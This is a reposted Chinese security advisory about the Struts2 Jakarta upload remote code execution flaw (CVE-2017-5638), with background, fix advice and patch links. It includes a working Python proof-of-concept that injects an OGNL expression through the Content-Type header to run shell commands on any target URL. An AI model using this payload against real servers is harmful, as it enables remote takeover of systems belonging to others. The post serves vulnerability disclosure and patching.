WEB安全

Struts2 远程代码执行漏洞(CVE-2017-5638)(含PoC)

字号+ 作者:bobao360 来源:转载 2017-03-07 13:45 我要评论( )

背景介绍 Struts2 的使用范围及其广泛,国内外均有大量厂商使用该框架。 Struts2 是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式......

http://p6.qhimg.com/t012e9f69bc74def9ff.png

背景介绍


Struts2 的使用范围及其广泛,国内外均有大量厂商使用该框架。

Struts2 是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller) 来建立模型与视图的数据交互。Struts 2是Struts的下一代产品,是在 struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架。(来源:百度百科)
 

漏洞描述


使用Jakarta插件处理文件上传操作时可能导致远程代码执行漏洞。

http://p9.qhimg.com/t0180d967ced28d63f5.png

漏洞影响


攻击者可以在文件上传时通过构造HTTP请求头中的Content-Type值可能造成远程代码执行漏洞。

 

PoC(来源于网络:http://www.cnblogs.com/milantgh/p/6512739.html  )


 

 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
#! /usr/bin/env python
# encoding:utf-8
import urllib2
import sys
from poster.encode import multipart_encode
from poster.streaminghttp import register_openers
def poc():
    register_openers()
    datagen, header = multipart_encode({"image1": open("tmp.txt", "rb")})
    header["User-Agent"]="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
    header["Content-Type"]="%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ifconfig').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
    request = urllib2.Request(str(sys.argv[1]),datagen,headers=header)
    response = urllib2.urlopen(request)
    print response.read()
poc()

 

修复建议


1. 严格过滤 Content-Type 里的内容,严禁ognl表达式相关字段。

2. 如果您使用基于Jakarta插件,请升级到Apache Struts 2.3.32或2.5.10.1版本。

 

官网公告


https://cwiki.apache.org/confluence/display/WW/S2-045

 

补丁地址


Struts 2.3.32:https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.32 

Struts 2.5.10.1:https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1


本文来自: 蜗蜗侠's Blog-关注网络安全 http://blog.icxun.cn/Web/583.html

1.本站遵循行业规范,任何转载的稿件都会明确标注作者和来源;2.本站的原创文章,请转载时务必注明文章作者和来源,不尊重原创的行为我们将追究责任;3.作者投稿可能会经我们编辑修改或补充。

相关文章
  • Struts2远程命令执行漏洞 S2-045

    Struts2远程命令执行漏洞 S2-045

    2017-03-14 09:20

网友点评
暂时未开启评论功能~